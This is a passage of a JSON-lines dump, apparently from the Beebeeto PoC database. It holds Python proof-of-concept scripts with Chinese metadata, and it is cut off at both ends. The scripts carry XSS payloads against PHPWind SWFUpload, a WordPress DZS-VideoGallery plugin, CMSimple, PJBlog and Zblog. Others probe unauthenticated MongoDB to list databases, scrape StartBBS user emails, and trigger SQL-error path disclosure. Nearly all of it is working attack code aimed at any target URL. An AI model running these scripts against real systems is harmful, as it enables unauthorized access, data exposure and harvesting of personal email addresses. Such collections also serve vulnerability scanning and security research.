@classmethod\r\n    def verify(cls, args):\r\n        flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n        file_path = \"/res/js/dev/util_libs/swfupload/Flash/swfupload.swf\"\r\n        verify_url = args['options']['target'] + file_path\r\n\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n\r\n        request = urllib2.Request(verify_url)\r\n        response = urllib2.urlopen(request)\r\n        content = response.read()\r\n        md5_value = md5.new(content).hexdigest()\r\n\r\n        if md5_value in flash_md5:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url + '?movieName=\"])}catch(e){alert(1)}//'\r\n            return args\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "http://packetstormsecurity.com/files/118059/SWF-Upload-Cross-Site-Scripting.html", "app_name": "PHPWind", "id": "poc-2014-0199", "layer4_protocol": null}
+{"create_date": "2014-12-10 13:35:45", "name": "WordPress DZS-VideoGallery /ajax.php XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "WordPress DZS-VideoGallerye,xss\u6f0f\u6d1e,/wp-content/plugins/dzs-videogallery/ajax.php, php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0195',\r\n            'name': 'WordPress DZS-VideoGallery /ajax.php XSS\u6f0f\u6d1e POC',\r\n            'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n            'create_date': '2014-12-10',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'WordPress DZS-VideoGallery',\r\n            'vul_version': [''],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['WordPress DZS-VideoGallerye', 'xss\u6f0f\u6d1e', '/wp-content/plugins/dzs-videogallery/ajax.php', 'php'],\r\n            'desc': '''\r\n                    WordPress\u662fWordPress\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u5957\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u8be5\u5e73\u53f0\u652f\u6301\u5728PHP\u548cMySQL\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u4e2a\u4eba\u535a\u5ba2\u7f51\u7ad9\u3002\r\n                    DZS-VideoGallery\u662f\u5176\u4e2d\u7684\u4e00\u4e2aDZS\u89c6\u9891\u5e93\u63d2\u4ef6\u3002 \r\n                    WordPress DZS-VideoGallery\u63d2\u4ef6\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u8f93\u5165\u3002\r\n                    \u5f53\u7528\u6237\u6d4f\u89c8\u88ab\u5f71\u54cd\u7684\u7f51\u7ad9\u65f6\uff0c\u5176\u6d4f\u89c8\u5668\u5c06\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u653b\u51fb\u8005\u7a83\u53d6\u57fa\u4e8ecookie\u7684\u8eab\u4efd\u8ba4\u8bc1\u5e76\u53d1\u8d77\u5176\u5b83\u653b\u51fb\u3002\r\n                    ''',\r\n            'references': ['http://sebug.net/vuldb/ssvid-61532',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/wp-content/plugins/dzs-videogallery/ajax.php?ajax=true&amp;height=400&amp;\"\r\n                   \"width=610&amp;type=vimeo&amp;source=%22%2F%3E%3Cscript%3Ealert%28bb2%29%3C%2Fscript%3E\")\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<script>alert(\"bb2\")</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n        \r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "WordPress\u662fWordPress\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u5957\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u8be5\u5e73\u53f0\u652f\u6301\u5728PHP\u548cMySQL\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u4e2a\u4eba\u535a\u5ba2\u7f51\u7ad9\u3002\r\nDZS-VideoGallery\u662f\u5176\u4e2d\u7684\u4e00\u4e2aDZS\u89c6\u9891\u5e93\u63d2\u4ef6\u3002 \r\nWordPress DZS-VideoGallery\u63d2\u4ef6\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u8f93\u5165\u3002\r\n\u5f53\u7528\u6237\u6d4f\u89c8\u88ab\u5f71\u54cd\u7684\u7f51\u7ad9\u65f6\uff0c\u5176\u6d4f\u89c8\u5668\u5c06\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u653b\u51fb\u8005\u7a83\u53d6\u57fa\u4e8ecookie\u7684\u8eab\u4efd\u8ba4\u8bc1\u5e76\u53d1\u8d77\u5176\u5b83\u653b\u51fb\u3002", "app_name": "WordPress", "id": "poc-2014-0195", "layer4_protocol": null}
+{"create_date": "2014-12-10 12:38:52", "name": "Mongodb \u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Mongodb\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,27017/28017\u7aef\u53e3", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport pymongo\r\nimport urllib2\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0194',\r\n            'name': 'Mongodb \u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-12-10',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [28017],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Mongodb',\r\n            'vul_version': ['*'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['Mongodb\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', '\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '27017/28017\u7aef\u53e3'],\r\n            'desc': 'mongodb\u542f\u52a8\u65f6\u672a\u52a0 --auth\u9009\u9879\uff0c\u5bfc\u81f4\u65e0\u9700\u8ba4\u8bc1\u5373\u53ef\u8fde\u63a5mongodb\u6570\u636e\u5e93\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002',\r\n            'references': ['N/A',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target']\r\n        ip_addr = urlparse.urlparse(verify_url).netloc\r\n        if args['options']['verbose']:\r\n            print '[*] Connect mongodb: ' + ip_addr + ':27017'\r\n        try:\r\n            conn = pymongo.MongoClient(ip_addr, 27017, socketTimeoutMS=3000)\r\n            dbname = conn.database_names()\r\n            if dbname:\r\n                args['success'] = True\r\n                args['poc_ret']['vul_url'] = ip_addr + ':27017'\r\n                args['poc_ret']['database_names'] = dbname\r\n        except Exception, e:\r\n            if args['options']['verbose']:\r\n                print str(e)\r\n            args['success'] = False\r\n            return args\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "mongodb\u542f\u52a8\u65f6\u672a\u52a0 --auth\u9009\u9879\uff0c\u5bfc\u81f4\u65e0\u9700\u8ba4\u8bc1\u5373\u53ef\u8fde\u63a5mongodb\u6570\u636e\u5e93\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002", "app_name": "MongoDB", "id": "poc-2014-0194", "layer4_protocol": null}
+{"create_date": "2014-12-10 00:48:32", "name": "StartBBS v1.1.5 \u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "StartBBS\u4fe1\u606f\u6cc4\u9732,\u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0192',\r\n            'name': 'StartBBS v1.1.5 \u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2014-12-10',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'StartBBS',\r\n            'vul_version': ['1.1.5'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['StartBBS\u4fe1\u606f\u6cc4\u9732', '\u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e', 'php'],\r\n            'desc': '''\r\n                    \u4ee3\u7801 /themes/default/userinfo.php\u5728\u7b2c86\u884c\u6709\u8fd9\u6837\u4e00\u53e5\uff1a\r\n                        <div class='inner'><p><?php echo $introduction?></p><!--<p>\r\n                        \u8054\u7cfb\u65b9\u5f0f: <a href=\"mailto:<?php echo $email?>\" class=\"external mail\">\r\n                        <?php echo $email?></a></p>--></div>\r\n\r\n                    \u8f93\u51fa\u4e86\u7528\u6237\u7684\u90ae\u7bb1\uff0c\u4f46\u662f\u7ed9\u6ce8\u91ca\u6389\u4e86\uff0c\u6240\u4ee5\u7528\u6237\u9875\u9762\u770b\u4e0d\u5230\u3002\u3002\u67e5\u770b\u6e90\u4ee3\u7801\u5373\u53ef\r\n                    ''',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-051696',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        # GET User\r\n        url = args['options']['target']\r\n        index_content = urllib2.urlopen(url).read()\r\n        regex_user = re.compile(r'(/user/info/\\d+)\" class=\"dark startbbs profile_link\"', re.IGNORECASE)\r\n        regex_mail = re.compile(r\"\\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4}\\b\", re.IGNORECASE)\r\n        user_list = regex_user.findall(index_content)\r\n        # Main\r\n        if user_list:\r\n            user_url = []\r\n            args['poc_ret']['user_email'] = []\r\n            # GET User homepage\r\n            for i in user_list[-3:]:\r\n                url_tmp = url + i\r\n                user_url.append(url_tmp)\r\n            # GET Email\r\n            for i in user_url:\r\n                if args['options']['verbose']:\r\n                    print '[*] Request URL: ' + i\r\n                try:\r\n                    content = urllib2.urlopen(i).read()\r\n                except:\r\n                    continue\r\n                mail_list = regex_mail.findall(content)\r\n            # Success or False\r\n            if mail_list:\r\n                for mail in mail_list:\r\n                    args['success'] = True\r\n                    args['options']['target'] = user_url\r\n                    args['poc_ret']['user_email'].append(mail)\r\n            if not args['poc_ret']['user_email']:\r\n                args['success'] = False\r\n                args['poc_ret'].pop('user_email')\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u4ee3\u7801 /themes/default/userinfo.php\u5728\u7b2c86\u884c\u6709\u8fd9\u6837\u4e00\u53e5\uff1a\r\n    <div class='inner'><p><?php echo $introduction?></p><!--<p>\r\n    \u8054\u7cfb\u65b9\u5f0f: <a href=\"mailto:<?php echo $email?>\" class=\"external mail\">\r\n    <?php echo $email?></a></p>--></div>\r\n\r\n\u8f93\u51fa\u4e86\u7528\u6237\u7684\u90ae\u7bb1\uff0c\u4f46\u662f\u7ed9\u6ce8\u91ca\u6389\u4e86\uff0c\u6240\u4ee5\u7528\u6237\u9875\u9762\u770b\u4e0d\u5230\u3002\u3002\u67e5\u770b\u6e90\u4ee3\u7801\u5373\u53ef", "app_name": "Startbbs", "id": "poc-2014-0192", "layer4_protocol": null}
+{"create_date": "2014-12-09 23:53:01", "name": "StartBBS v1.1.3 \u7269\u7406\u8def\u5f84\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "StartBBS\u4fe1\u606f\u6cc4\u9732,StartBBS\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0191',\r\n            'name': 'StartBBS v1.1.3 \u7269\u7406\u8def\u5f84\u6cc4\u6f0f POC',\r\n            'author': '\u5c0f\u9a6c\u7532',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'StartBBS',\r\n            'vul_version': ['1.1.3'],\r\n            'type': 'Information Disclosure',\r\n            'tag': ['StartBBS\u4fe1\u606f\u6cc4\u9732', 'StartBBS\u7206\u8def\u5f84', 'php'],\r\n            'desc': 'http://startbbs/index.php/home/getmore/w.jsp \u968f\u610f\u6784\u9020\u4e00\u4e2a.jsp\u7206\u51fa\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u53e5',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2013-045780',\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/index.php/home/getmore/w.jsp'\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if 'Filename:' in content and 'You have an error in your SQL syntax' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "http://startbbs/index.php/home/getmore/w.jsp \u968f\u610f\u6784\u9020\u4e00\u4e2a.jsp\u7206\u51fa\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u53e5", "app_name": "Startbbs", "id": "poc-2014-0191", "layer4_protocol": null}
+{"create_date": "2014-12-09 23:25:29", "name": "CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "CMSimple\u6f0f\u6d1e,xss\u6f0f\u6d1e,/whizzywig/wb.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0190',\r\n            'name': 'CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e POC',\r\n            'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'CMSimple',\r\n            'vul_version': ['3.54'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['CMSimple\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/whizzywig/wb.php', 'php'],\r\n            'desc': '''\r\n                    \u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n                    \u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n                    ''',\r\n            'references': ['http://sebug.net/vuldb/ssvid-61903',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27bb2%27%29%3C/script%3E'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<script>alert(\"bb2\")</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n        \r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n\u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002", "app_name": "CMSimple", "id": "poc-2014-0190", "layer4_protocol": null}
+{"create_date": "2014-12-09 23:04:31", "name": "PJBlog 3.0.6.170 /Action.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "PJBlog\u6f0f\u6d1e,xss\u6f0f\u6d1e,/Action.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0188',\r\n            'name': 'PJBlog 3.0.6.170 /Action.asp XSS\u6f0f\u6d1e POC',\r\n            'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PJBlog',\r\n            'vul_version': ['3.0.6.170'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['PJBlog\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/Action.asp', 'asp'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aAction.asp',\r\n            'references': ['http://sebug.net/vuldb/ssvid-11236',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/Action.asp?action=type1&mainurl=xxx\">%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<script>alert(\"bb2\")</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n        \r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aAction.asp", "app_name": "PJblog", "id": "poc-2014-0188", "layer4_protocol": null}
+{"create_date": "2014-12-09 23:02:42", "name": "PJBlog 3.0.6.170 /Getarticle.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "PJBlog\u6f0f\u6d1e,xss\u6f0f\u6d1e,/Getarticle.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0187',\r\n            'name': 'PJBlog 3.0.6.170 /Getarticle.asp XSS\u6f0f\u6d1e POC',\r\n            'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PJBlog',\r\n            'vul_version': ['3.0.6.170'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['PJBlog\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/Getarticle.asp','asp'],\r\n            'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.asp',\r\n            'references': ['http://sebug.net/vuldb/ssvid-11237',\r\n            ],\r\n        },\r\n    }\r\n\r\n   \r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = '/Getarticle.asp?id=1&blog_postFile=x%22%20)></a>%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E&page=2'\r\n        verify_url = args['options']['target'] + payload\r\n        req = urllib2.Request(verify_url)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(req).read()\r\n        if '<script>alert(\"bb2\")</script>' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n        \r\n    exploit = verify\r\n        \r\n    \r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.asp", "app_name": "PJblog", "id": "poc-2014-0187", "layer4_protocol": null}
+{"create_date": "2014-12-09 22:08:37", "name": "Zblog 1.8 /search.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Zblog\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0184',\r\n            'name': 'Zblog 1.8 /search.asp XSS\u6f0f\u6d1e POC',\r\n            'author': 'user1018',\r\n            'create_date': '2014-12-09',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Zblog',\r\n            'vul_version': ['1.8'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['Zblog\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.asp', 'asp'],\r\n            'desc': '''\r\n                    search.asp\u5728\u5bf9\u7528\u6237\u63d0\u4ea4\u6570\u636e\u5904\u7406\u4e0a\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n                    ''',\r\n            'references': ['http://sebug.net/vuldb/ssvid-19246',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = 